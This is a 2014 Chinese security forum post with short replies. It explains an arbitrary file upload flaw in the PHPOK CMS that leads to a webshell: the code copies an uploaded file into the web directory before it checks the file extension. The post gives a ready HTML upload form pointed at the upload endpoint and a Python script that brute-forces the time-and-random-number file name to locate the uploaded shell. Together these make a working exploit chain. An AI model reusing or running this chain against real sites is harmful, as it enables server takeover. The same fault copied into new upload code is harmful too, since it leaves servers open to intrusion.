90_ 发表于 2014-7-24 10:22:05

phpok前台任意文件上传getshell

/framework/www/upload_control.php第45行:
function base_f()
{
$rs = $this->upload_base("Filedata");
if($rs["status"] == "ok")
{
error("图片上传成功",$this->url("res","add"),"ok");
}
else
{
error($rs["error"],$this->url("res","add"),"error");
}
}

调用了upload_base,跟进去看看:
function upload_base($input_name = "Filedata",$upload_type)
{
$cateid = $this->get("cateid","int");
$rs = $this->upload($input_name);
if($rs["status"] != "ok")
{
return $rs;
}

调用了$this->upload来上传文件。继续跟进去看看:
function upload($inputname)
{
if(!$this->ifset) $this->auto_app();
if(!$inputname) return false;
$path = $this->dir_res;
if(!isset($_FILES[$inputname]))
{
return array("status"=>"error","error_id"=>"1001","error"=>"没有指定上传的图片");
}
//生成新的文件名称
$file_name = substr(md5(time().rand(0,9999)),9,16);
$zip_filename = $file_name;//如果是zip压缩包
$path_info = pathinfo($_FILES[$inputname]['name']);
$file_extension = strtolower($path_info["extension"]);
$file_name .= ".".$file_extension;
$tmp_title = $_FILES[$inputname]['name'];
if(!@copy($_FILES[$inputname]["tmp_name"],$path.$file_name))
{
return array("status"=>"error","error_id"=>"1002","error"=>"图片无法复制到指定目录");
}
if(!in_array($file_extension,$this->file_ext))
{
return array("status"=>"error","error_id"=>"1003","error"=>"附件类型不支持");
}
return array("status"=>"ok","title"=>$tmp_title,"filename"=>$path.$file_name,"ext"=>$file_extension);
}


仔细观察最后两个if语句,第一个是copy,第二个才是判断后缀名。也就是说它先把我上传的任意文件copy到web目录下,再判断了这个文件后缀是否合法。而且判断完毕后并没有删除不合法的文件。

所以我们可以利用这一点来上传任意文件,虽然最后我不知道上传后的文件名,但这个文件名是可以爆破出来的。

文件名命名规则:substr(md5(time().rand(0,9999)),9,16)



取当前时间 和 0-9999之前的随机数的md5值。这个好说,当前时间基本就在发包以后的1~3秒,4位随机数。也就说我只用爆破大概1W到3W次就能找到我上传的文件了。

本地构造一个上传单页:

<form name="form" method="post" action="http://www.phpok.com/index.php?c=upload&f=base" enctype="multipart/form-data" >

<input type="file" name="Filedata">

<input type="submit" name="Submit" value="上传" ></form>


拉一个shell点击上传。中途抓包,查看返回包:

10.jpg

可以看到返回包的时间,这个时间基本上就是生成文件名的时候取的time()。

通过返回包里的Date计算出此时的时间戳,也就是重命名时候取的time()值(就算不是,相差也不会太大,一两秒内)


我计算出的时间戳值为1401619111



然后我简单写一个单线程脚本(py需要安装requests库),来跑一下数据包。上传的文件默认放在/res目录下,我们就来爆破一下这个文件名:

import requests, hashlib

def md5(str):

      m = hashlib.md5()

      m.update(str)

      return m.hexdigest()

time = '1401619111'

for x in xrange(0,9999):

target = "http://localhost/phpok/res/%s.php" % md5(time + str(x))

res = requests.get(target)

if res.status_code != 404:

print x, target

break

因为是本地,所以很快就跑出了shell的地址:

访问可见phpinfo:


作者:phith0n

至高无上 发表于 2014-7-24 10:24:11

哈哈,我抢到沙发了:lol

擎天小猪 发表于 2014-7-24 11:08:42

简直凶残

blueroot 发表于 2014-7-24 13:19:45

testKai 发表于 2014-7-25 09:47:48

好文,顶赞

csadsl 发表于 2014-7-25 12:21:27

刚好需要,学习了

离人 发表于 2014-7-26 13:19:16

学习下思路

青春不朽 发表于 2014-7-27 11:16:13

收藏,这个值得拥有oo

phantomer 发表于 2014-7-27 14:05:18

值得学习

joker24 发表于 2014-7-28 17:22:07

赏你个大JB
页: [1] 2
查看完整版本: phpok前台任意文件上传getshell